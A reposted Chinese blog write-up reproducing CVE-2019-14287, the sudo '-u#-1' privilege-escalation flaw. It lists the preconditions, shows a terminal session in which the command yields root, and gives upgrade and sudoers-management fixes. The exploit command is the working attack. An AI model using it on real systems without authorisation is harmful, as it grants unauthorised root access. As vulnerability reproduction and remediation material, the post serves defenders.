[漏洞復現]CVE-2019-14287 sudo提權漏洞

本文轉載自查看原文 2019-10-15 17:19 1827 Linux

漏洞描述

2019年10月14日，CVE官方發布了CVE-2019-14287的漏洞預警。通過特定payload，用戶可提升至root權限。
利用前提

sudo -v < 1.8.28
知道當前用戶的密碼
當前用戶存在於sudo權限列表

漏洞復現

mark@mark-Pc:~$ id
uid=1000(mark) gid=1000(mark) 組=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
mark@mark-Pc:~$ sudo -u#-1 id
[sudo] mark 的密碼： 
uid=0(root) gid=1000(mark) 組=1000(mark)

修復建議

升級sudo到1.8.28版本
做好sudo用戶列表管理

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 sudo 提權漏洞（CVE-2019-14287）復現 linux CVE-2019-14287 Sudo提權漏洞 10.16Maccms后門分析、Sudo提權漏洞（CVE-2019-14287）復現 [提權]sudo提權復現(CVE-2019-14287) 2019-10-16，sudo提權漏洞（CVE-2019-14287）實現 Linux sudo(CVE-2019-14287)漏洞復現過程源碼安裝sudo-1.8.31,解決CVE-2019-14287(sudo提權)問題 Sudo提權漏洞復現 CVE-2021-3156 sudo提權漏洞復現【CVE-2021-3156】linux sudo提權漏洞復現及修復